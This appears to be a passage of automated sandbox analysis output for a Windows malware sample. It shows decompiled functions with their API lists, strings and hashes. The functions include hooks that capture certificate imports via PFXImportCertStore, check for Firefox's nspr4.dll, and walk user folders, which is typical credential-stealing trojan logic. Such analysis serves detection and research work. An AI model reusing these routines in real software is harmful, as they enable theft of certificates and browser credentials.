					E00411DB1( &_v92,  &_v92, 0, _t37);
					_v92 = _t37;
					_v84 =  &_v196;
					ResetEvent( *(_t35 + 0xc));
					if(E004135C5( &_v716, 0x4030d4, 0,  &_v92,  &_v20) != 0) {
						E00411D3A(_t43,  &_v20, 0x10);
						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
							goto L6;
						} else {
							TerminateProcess( *_t43, 0);
							E0041370D(_t43);
							goto L3;
						}
					} else {
						L3:
						_t31 = 0;
					}
				} else {
					L6:
					_t31 = 1;
				}
				return _t31;
			}

0x00406d5a
0x00406d5a
0x00406d5d
0x00406d6d
0x00406d83
0x00406d89
0x00406d96
0x00406daa
0x00406db1
0x00406db8
0x00406dc6
0x00406dc9
0x00406dcc
0x00406dee
0x00406dfb
0x00406e10
0x00000000
0x00406e12
0x00406e15
0x00406e1b
0x00000000
0x00406e1b
0x00406df0
0x00406df0
0x00406df0
0x00406df0
0x00406e22
0x00406e22
0x00406e22
0x00406e22
0x00406e27

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00406D72
ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00406DCC
WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,?,004030D4,00000000,?,?), ref: 00406E08
TerminateProcess.KERNEL32(?,00000000), ref: 00406E15

Part of subcall function 0041370D: CloseHandle.KERNEL32(00000000,0001FDA6,0040BB5B,00000000,00422918,00000000,0040BC8D,00000000,00000000), ref: 0041371C
Part of subcall function 0041370D: CloseHandle.KERNEL32(00000000,0001FDA6,0040BB5B,00000000,00422918,00000000,0040BC8D,00000000,00000000), ref: 00413725

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
String ID:
API String ID: 401097067-0
Opcode ID: 9738a14c694ee6551965841c5ab12fcfeb4589d8a8b9a83c763b065ebb7eda9e
Instruction ID: 3c1aa04e7d7e7f4ab942308506662c5ea5cc4bd0a055a61fc7e92bc5a9463e46
Opcode Fuzzy Hash: 9738a14c694ee6551965841c5ab12fcfeb4589d8a8b9a83c763b065ebb7eda9e
Instruction Fuzzy Hash: 8E11A571500205ABDB10AFA5DC49FEF7BBDEF40704F00457AF905F60A5DA389A85CA68

Uniqueness

Uniqueness Score: -1.00%

Function 00410713, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00410713(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __edi;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t28;
				intOrPtr* _t29;
				intOrPtr _t31;

				if(E0041CB59() != 0) {
					_t29 = _a16;
					_t24 = _a12;
					_t12 =  *0x423b94(_a4, 0, _t24, _t29, _t23, _t28, _t17);
					_t13 =  *0x423b90(_a4, _a8, _t24, _t29);
					_a4 = _t13;
					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
						EnterCriticalSection(0x422b2c);
						if(( *0x422b44 & 0x00000001) == 0) {
							_t31 =  *_t29;
							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
								_t16 = 0;
							} else {
								_t16 = E00404F3F(_t21, _t22, _t31);
							}
							if(_t16 != 0) {
								 *0x422b44 =  *0x422b44 | 0x00000001;
							}
						}
						LeaveCriticalSection(0x422b2c);
					}
					return _a4;
				}
				goto ( *0x423b90);
			}

0x0041071d
0x00410728
0x0041072c
0x00410736
0x00410746
0x0041074c
0x00410751
0x0041076a
0x00410777
0x0041077c
0x0041078c
0x00410797
0x0041078e
0x00410790
0x00410790
0x0041079b
0x0041079d
0x0041079d
0x0041079b
0x004107a5
0x004107a5
0x004107b2
0x004107b2
0x00410720

APIs

Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61

EnterCriticalSection.KERNEL32(00422B2C), ref: 0041076A
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00410784
LeaveCriticalSection.KERNEL32(00422B2C), ref: 004107A5

Strings

nspr4.dll, xrefs: 0041077E

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeaveObjectSingleWaitlstrcmpi
String ID: nspr4.dll
API String ID: 3081114022-741017701
Opcode ID: 407d70449565d54b75f2aaf72172146937e094d39cdc2e0bfa7857c38504335e
Instruction ID: f712b93b93d2c4d633cdd65f6f1a6689b77f217632ac9426d212a66442553e8c
Opcode Fuzzy Hash: 407d70449565d54b75f2aaf72172146937e094d39cdc2e0bfa7857c38504335e
Instruction Fuzzy Hash: 2111C439200205EBCB204F11AD48BE77F68EF45355F04002AFD58572A2C7B8B8D2CE98

Uniqueness

Uniqueness Score: -1.00%

Function 0041546B, Relevance: 6.0, APIs: 4, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041546B(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t16;

				while(1) {
					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
					if(_t16 != 1) {
						break;
					}
					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
						if(_v28.message != 0x12) {
							TranslateMessage( &_v28);
							DispatchMessageW( &_v28);
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t16;
			}

0x004154b2
0x004154be
0x004154c3
0x00000000
0x00000000
0x0041549e
0x00415486
0x0041548d
0x00415498
0x00000000
0x00415498
0x00000000
0x00415486
0x0041549e
0x004154c6
0x004154ce

APIs

PeekMessageW.USER32 ref: 004154A8
MsgWaitForMultipleObjects.USER32 ref: 004154BC

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: MessageMultipleObjectsPeekWait
String ID:
API String ID: 3986374578-0
Opcode ID: 10db4ceb0b99e240a6431a23ca852af127ceca0bedce08fe67b91c423f0e8d48
Instruction ID: 78f504e82113b3e43b71747f4f98a3c45b57dc40824475f2458ebcf5b96ccdb7
Opcode Fuzzy Hash: 10db4ceb0b99e240a6431a23ca852af127ceca0bedce08fe67b91c423f0e8d48
Instruction Fuzzy Hash: 55F0FC32504319BFD710AEA9DD48EE7BB9CEB85355F040536F604D2171D179988486B5

Uniqueness

Uniqueness Score: -1.00%

Function 00419A3E, Relevance: 6.0, APIs: 4, Instructions: 40
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419A3E(void* __eflags) {
				void* _t1;
				long _t6;
				void* _t12;

				_t1 = E0041CA33(_t12, 0x19367401, 1);
				_t19 = _t1;
				if(_t1 != 0) {
					if(E0041CB59() == 0) {
						L7:
						E004154D1(_t19);
						return 0;
					}
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t6 = WaitForSingleObject( *0x424024, 0x1388);
					while(_t6 == 0x102) {
						E0040647F();
						_t6 = WaitForSingleObject( *0x424024, 0x1388);
					}
					goto L7;
				}
				return _t1 + 1;
			}

0x00419a46
0x00419a4b
0x00419a4f
0x00419a5b
0x00419a9f
0x00419aa0
0x00000000
0x00419aa5
0x00419a69
0x00419a81
0x00419a98
0x00419a8a
0x00419a96
0x00419a96
0x00000000
0x00419a9e
0x00000000

APIs

Part of subcall function 0041CA33: CreateMutexW.KERNEL32(00423B98,00000000,?,?,?,?,?), ref: 0041CA54

GetCurrentThread.KERNEL32 ref: 00419A62
SetThreadPriority.KERNEL32(00000000,?,?,?,19367401,00000001), ref: 00419A69
WaitForSingleObject.KERNEL32(00001388,?,?,?,19367401,00000001), ref: 00419A81

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
String ID:
API String ID: 3441234504-0
Opcode ID: 255fdd34acbe11715fb23278fb684a887b20837a33d700de9881c31b0e607634
Instruction ID: ae17521ab487d1678e795c368ceb53b64926216367371be20ce7ff7c94018088
Opcode Fuzzy Hash: 255fdd34acbe11715fb23278fb684a887b20837a33d700de9881c31b0e607634
Instruction Fuzzy Hash: DBF09E326041496FD71173B05D55FEB3A5CDF843D5720003BFA02E21A2C8394CC642BC

Uniqueness

Uniqueness Score: -1.00%

Function 00413373, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413373(intOrPtr _a4) {
				intOrPtr _v20;
				void* _v32;
				signed int _t6;
				signed int _t7;
				int _t9;
				int _t14;
				void* _t15;

				_t14 = 0;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t15 = _t6;
				_t7 = _t6 | 0xffffffff;
				if(_t15 != _t7) {
					_v32 = 0x1c;
					_t9 = Thread32First(_t15,  &_v32);
					while(_t9 != 0) {
						if(_v20 == _a4) {
							_t14 = _t14 + 1;
						}
						_t9 = Thread32Next(_t15,  &_v32);
					}
					CloseHandle(_t15);
					return _t14;
				}
				return _t7;
			}

0x0041337b
0x00413380
0x00413386
0x00413388
0x0041338d
0x00413394
0x0041339b
0x004133b7
0x004133a9
0x004133ab
0x004133ab
0x004133b1
0x004133b1
0x004133bc
0x00000000
0x004133c2
0x004133c7

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00413380
Thread32First.KERNEL32 ref: 0041339B
Thread32Next.KERNEL32 ref: 004133B1
CloseHandle.KERNEL32(00000000), ref: 004133BC

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3643885135-0
Opcode ID: 79fe4a6f05112d4bd9b8c6826af499282d638a22b5f7514bf2c623fae5ff0845
Instruction ID: 7cef4bd21420589aea3bace5b479b33f506f2ac09347e5ed659147de83ab01df
Opcode Fuzzy Hash: 79fe4a6f05112d4bd9b8c6826af499282d638a22b5f7514bf2c623fae5ff0845
Instruction Fuzzy Hash: 97F05475500119ABDB106F65DC48DEF7BBCEB85361B004162FD22E2194DB38DA45C6BD

Uniqueness

Uniqueness Score: -1.00%

Function 004055A4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
timeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004055A4(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
				char _v536;
				char _v600;
				char _v728;
				char _v744;
				struct _SYSTEMTIME _v760;
				intOrPtr _v764;
				intOrPtr _v772;
				intOrPtr _v776;
				char _v784;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t58;
				intOrPtr* _t59;
				void* _t61;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t71;
				char* _t74;
				signed int _t76;
				void* _t78;
				void* _t79;

				_t61 = __ecx;
				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
				_t59 = _a4;
				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
				_v776 = __eax;
				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E0041CB59() != 0) {
					GetSystemTime( &_v760);
					E00419897(0xaa,  &_v600);
					_t74 =  &_v744;
					E00419897(0xab, _t74);
					E00405383( &_v536, _t61);
					_push(_v760.wYear & 0x0000ffff);
					_push(_v760.wMonth & 0x0000ffff);
					_push(_v760.wDay & 0x0000ffff);
					_push(_t74);
					_push( &_v536);
					_push( &_v600);
					_t65 = 0x3e;
					_t47 = E004129F1( &_v600, _t65,  &_v728);
					_t79 = _t78 + 0x18;
					if(_t47 > 0 && E00407B20(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
						_t66 = _a8;
						if(_t66 != 0 &&  *_t66 != 0) {
							 *((short*)(E00411D3A(_t79 + 0x48 + E0041284D( &_v728) * 2, L".txt", 8) + 8)) = 0;
							_t64 = _t66;
							if(E00412B55(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
								E00407B20(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
								E00412B43( &_v784);
							}
						}
					}
				}
				return _v776;
			}

0x004055a4
0x004055aa
0x004055b1
0x004055bd
0x004055c3
0x004055c9
0x00405609
0x0040561b
0x00405620
0x00405629
0x00405635
0x0040563f
0x00405645
0x0040564b
0x0040564e
0x00405656
0x0040565e
0x00405661
0x00405666
0x0040566b
0x00405670
0x00405688
0x0040568d
0x004056b0
0x004056bb
0x004056c4
0x004056d6
0x004056db
0x004056db
0x004056c4
0x0040568d
0x00405670
0x004056ea

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 004055BD

Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61

GetSystemTime.KERNEL32(?), ref: 00405609

Part of subcall function 00405383: GetUserNameExW.SECUR32(00000002,?,?), ref: 00405398

Strings

.txt, xrefs: 0040569F

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
String ID: .txt
API String ID: 1412380219-2195685702
Opcode ID: 2697c63c61a5594fa9dde59ba6d634cb93e8aed94b133e909efdec1fc6a016eb
Instruction ID: c24e941ba6854cd44b86739ea1cbf8b0ae9c8150a9786ca286445517a81dfd31
Opcode Fuzzy Hash: 2697c63c61a5594fa9dde59ba6d634cb93e8aed94b133e909efdec1fc6a016eb
Instruction Fuzzy Hash: 5631D2311047419BCB20AF55CD45BAFB7A8EF88354F80092FFA48A72D1D7B9D944CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00408078, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040315C,00000000,00004401,0040316C,?), ref: 004080A8
CoCreateInstance.OLE32(0040312C,00000000,00004401,0040313C,?), ref: 004080FB

Strings

D, xrefs: 00408126

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID: D
API String ID: 542301482-2746444292
Opcode ID: 2819d2fab729000be82d0e02369a6c9a25e8454bcafbd5f4b901769a36fe3f0e
Instruction ID: 88765526117be33de3586bc452c96885893a58124429bd89a7740fa52d40efe5
Opcode Fuzzy Hash: 2819d2fab729000be82d0e02369a6c9a25e8454bcafbd5f4b901769a36fe3f0e
Instruction Fuzzy Hash: 81316DB2204305AFD710DF64CD85D6BB7ECAF84744F10052EF994AB280EB34DD068BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041635B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041635B(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
				char _v268;
				char _v280;
				char _v284;
				signed int _v290;
				signed int _v292;
				signed int _v296;
				unsigned int _t24;
				void* _t26;
				signed int _t28;
				char* _t29;
				void* _t30;
				void* _t41;
				char* _t42;
				void* _t46;
				signed int _t50;
				void* _t51;
				signed int _t52;
				void* _t54;

				_t54 = (_t52 & 0xfffffff8) - 0x118;
				_t46 = __ecx;
				_t24 = E00411D3A( &_v284, _a4, 0x10);
				_v296 = _v296 ^ _t24;
				_v292 = _v292 ^ _t24;
				_v290 = _v290 ^ _t24 >> 0x00000010;
				_t41 = 0;
				_t26 = 0;
				do {
					 *(_t54 + _t41 + 0x10) =  *(_t54 + _t41 + 0x10) ^  *(_t51 + _t26 + 0xc);
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t41 = _t41 + 1;
				} while (_t41 < 8);
				if(_a12 != 0) {
					E00411D3A( &_v268, _a12, 0x102);
					E0041317A( &_v280, _t41,  &_v296, 0x10);
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 != 0) {
					_t30 = _t28 - 1;
					if(_t30 == 0) {
						_t42 = L"Local\\";
						_push(6);
						goto L11;
					} else {
						if(_t30 == 1) {
							_t42 = L"Global\\";
							_push(7);
							L11:
							_pop(_t50);
							E0041209F(_t50, _t42, _t46);
							_t46 = _t46 + _t50 * 2;
						}
					}
				}
				_t29 =  &_v284;
				__imp__StringFromGUID2(_t29, _t46, 0x28);
				return _t29;
			}

0x00416361
0x0041636e
0x00416375
0x0041637a
0x0041637e
0x00416386
0x0041638b
0x0041638d
0x0041638f
0x00416393
0x00416397
0x0041639b
0x0041639d
0x0041639d
0x0041639f
0x004163a0
0x004163a9
0x004163b8
0x004163c8
0x004163c8
0x004163d1
0x004163d4
0x004163d6
0x004163d7
0x004163e5
0x004163ea
0x00000000
0x004163d9
0x004163da
0x004163dc
0x004163e1
0x004163ec
0x004163ec
0x004163f1
0x004163f6
0x004163f6
0x004163da
0x004163d7
0x004163fc
0x00416401
0x0041640c

APIs

StringFromGUID2.OLE32(?,2937498D,00000028,?,?,00000010,00000000,00020016), ref: 00416401

Strings

Global\, xrefs: 004163DC
Local\, xrefs: 004163E5

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: FromString
String ID: Global\$Local\
API String ID: 1694596556-639276846
Opcode ID: 4e05cb8383acf920586fbfa06569b2829002de3e21291a79f6ec32e47e29196a
Instruction ID: 2f4c39f4f6c3a60c76e0a3bb36a5417527b83b7cf64943caefc6f6a756ac4eac
Opcode Fuzzy Hash: 4e05cb8383acf920586fbfa06569b2829002de3e21291a79f6ec32e47e29196a
Instruction Fuzzy Hash: FF11033221434967C714DF788806BEF3798EB84314F008D2FFAA2D61C1DAB8D594C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00409DD7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00409DD7(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v572;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v52;
				E00419897(0x81, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E00411DB1( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v572;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E00417437( &_v572,  &_v16, _t37, 1, 2, E00409B3C,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E00411CFE(_v12);
				}
				return E00407DEB(_t29, _v12, 0xcb);
			}

0x00409de2
0x00409dea
0x00409df3
0x00409dfd
0x00409e04
0x00409e0b
0x00409e12
0x00409e17
0x00409e19
0x00409e19
0x00409e27
0x00409e2d
0x00409e2f
0x00409e41
0x00409e4a
0x00409e4a
0x00409e4f
0x00409e50
0x00409e58
0x00000000
0x00409e71
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00409E27

Part of subcall function 00417437: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00417476
Part of subcall function 00417437: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041749D
Part of subcall function 00417437: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 004174E7
Part of subcall function 00417437: Sleep.KERNEL32(00000000,?,?), ref: 00417544
Part of subcall function 00417437: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00417572
Part of subcall function 00417437: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00417584

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

Strings

#, xrefs: 00409E0B
&, xrefs: 00409DFD

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: 2cb05778f832071ba58f21e5b8a60e1dc051c5e9afa5e7374697df4b08c6ce09
Instruction ID: d50a05666bb7d6543c4f4ac3cf3b5a92ea5c0f941f588bc82f6b0a7bf495c7d6
Opcode Fuzzy Hash: 2cb05778f832071ba58f21e5b8a60e1dc051c5e9afa5e7374697df4b08c6ce09
Instruction Fuzzy Hash: DD118872A01228AADB20EA92DC09EDF7F78EF41744F00416AB505B6181D6785B85CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6F8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040A6F8(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v60;
				char _v580;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v60;
				E00419897(0x95, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E00411DB1( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v580;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E00417437( &_v580,  &_v16, _t37, 1, 2, E0040A469,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E00411CFE(_v12);
				}
				return E00407DEB(_t29, _v12, 0xcb);
			}

0x0040a703
0x0040a70b
0x0040a714
0x0040a71e
0x0040a725
0x0040a72c
0x0040a733
0x0040a738
0x0040a73a
0x0040a73a
0x0040a748
0x0040a74e
0x0040a750
0x0040a762
0x0040a76b
0x0040a76b
0x0040a770
0x0040a771
0x0040a779
0x00000000
0x0040a792
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040A748

Part of subcall function 00417437: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00417476
Part of subcall function 00417437: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041749D
Part of subcall function 00417437: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 004174E7
Part of subcall function 00417437: Sleep.KERNEL32(00000000,?,?), ref: 00417544
Part of subcall function 00417437: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00417572
Part of subcall function 00417437: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00417584

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

Strings

#, xrefs: 0040A72C
&, xrefs: 0040A71E

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: 1e815f639e77682b6dd5b1c416ec4fd7817b80d2ebfdcd6d7349425ea6610b40
Instruction ID: 9bec683737e40484ee2bee40589005d3366884df7614506f5ba96261a4621b9d
Opcode Fuzzy Hash: 1e815f639e77682b6dd5b1c416ec4fd7817b80d2ebfdcd6d7349425ea6610b40
Instruction Fuzzy Hash: 0E118675A012287ADB20AB96DC49FDF7F78EF41754F00406AF605B7180D2785A85CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 0041D030, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0041D030(void* __eflags) {
				signed int _v8;
				char _v20;
				char _v44;
				char _v92;
				void* __edi;
				void* __esi;
				void* _t17;
				CHAR* _t27;
				intOrPtr* _t28;
				WCHAR* _t30;
				struct HINSTANCE__* _t31;

				_t30 =  &_v44;
				E00419897(0xe3, _t30);
				_t31 = GetModuleHandleW(_t30);
				if(_t31 != 0) {
					_t27 =  &_v20;
					E00419861(0xe4, _t27);
					_t28 = GetProcAddress(_t31, _t27);
					if(_t28 == 0) {
						L4:
						_t17 = 0;
						L6:
						return _t17;
					}
					_v8 = _v8 & 0x00000000;
					_t32 =  &_v92;
					E00419897(0xd5,  &_v92);
					_push(0x1e6);
					_push("0xDFD223D7");
					if(E00412A6C( &_v8, _t32, 0x1030809) > 0) {
						 *_t28(0, _v8, E00404B7C, 0x10040);
						E00411CFE(_v8);
						_t17 = 1;
						goto L6;
					}
					goto L4;
				}
				return 0;
			}

0x0041d037
0x0041d03f
0x0041d04d
0x0041d051
0x0041d058
0x0041d060
0x0041d06f
0x0041d073
0x0041d0a8
0x0041d0a8
0x0041d0c7
0x00000000
0x0041d0c7
0x0041d075
0x0041d079
0x0041d081
0x0041d086
0x0041d08b
0x0041d0a6
0x0041d0bb
0x0041d0c0
0x0041d0c5
0x00000000
0x0041d0c5
0x00000000
0x0041d0a6
0x00000000

APIs

GetModuleHandleW.KERNEL32(?), ref: 0041D047
GetProcAddress.KERNEL32(00000000,?), ref: 0041D069

Strings

0xDFD223D7, xrefs: 0041D08B

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: 0xDFD223D7
API String ID: 1646373207-1434575014
Opcode ID: ade23846969630f2b45539821cecf583df18383a03357b3ee88b16cb16736e0a
Instruction ID: df32e31a5ac24e61d6fd7fab4322a1be0746b95bd9f8c9314909209acbf0a219
Opcode Fuzzy Hash: ade23846969630f2b45539821cecf583df18383a03357b3ee88b16cb16736e0a
Instruction Fuzzy Hash: 5C01D6B6E00254B7CB2076AA8C06BDF3F7C9B85714F000056FD04F7241DA7CDE4695A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD51, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041CD51(void* __ecx, WCHAR* __edi, void* __esi, signed int _a4) {
				char _v104;
				char _v154;
				char _v174;
				char _v194;
				char _v592;
				signed int _t13;
				int _t15;
				WCHAR* _t18;
				char* _t21;
				WCHAR* _t22;
				void* _t23;

				_t23 = __esi;
				_t22 = __edi;
				 *__edi = 0;
				E0041CCFF(__ecx,  &_v592);
				_t13 = _a4;
				if(_t13 == 0) {
					L6:
					_t21 =  &_v174;
					goto L7;
				} else {
					_t13 = _t13 - 1;
					if(_t13 == 0) {
						_t21 =  &_v194;
						L7:
						_t18 = 0x423bc0;
						goto L8;
					} else {
						_t13 = _t13 - 1;
						if(_t13 == 0) {
							goto L6;
						} else {
							_t15 = _t13 - 1;
							if(_t15 == 0) {
								_t18 = L"SOFTWARE\\Microsoft";
								_t21 =  &_v154;
								L8:
								_push(_t23);
								_t15 = E00411F09(_t13 | 0xffffffff, _t21,  &_v104, 0, 0x32);
								if(_t15 != 0) {
									_t15 = E00417593( &_v104, _t22, _t18);
									if(_t15 == 0) {
										L12:
										_t15 = 0;
										 *_t22 = 0;
									} else {
										if(_a4 == 0) {
											_t15 = PathRenameExtensionW(_t22, L".dat");
											if(_t15 == 0) {
												goto L12;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t15;
			}

0x0041cd51
0x0041cd51
0x0041cd5c
0x0041cd67
0x0041cd6f
0x0041cd72
0x0041cd92
0x0041cd92
0x00000000
0x0041cd74
0x0041cd74
0x0041cd75
0x0041cd8a
0x0041cd98
0x0041cd98
0x00000000
0x0041cd77
0x0041cd77
0x0041cd78
0x00000000
0x0041cd7a
0x0041cd7a
0x0041cd7b
0x0041cd7d
0x0041cd82
0x0041cd9d
0x0041cd9d
0x0041cda8
0x0041cdb0
0x0041cdb7
0x0041cdbe
0x0041cdd6
0x0041cdd6
0x0041cdd8
0x0041cdc0
0x0041cdc4
0x0041cdcc
0x0041cdd4
0x00000000
0x00000000
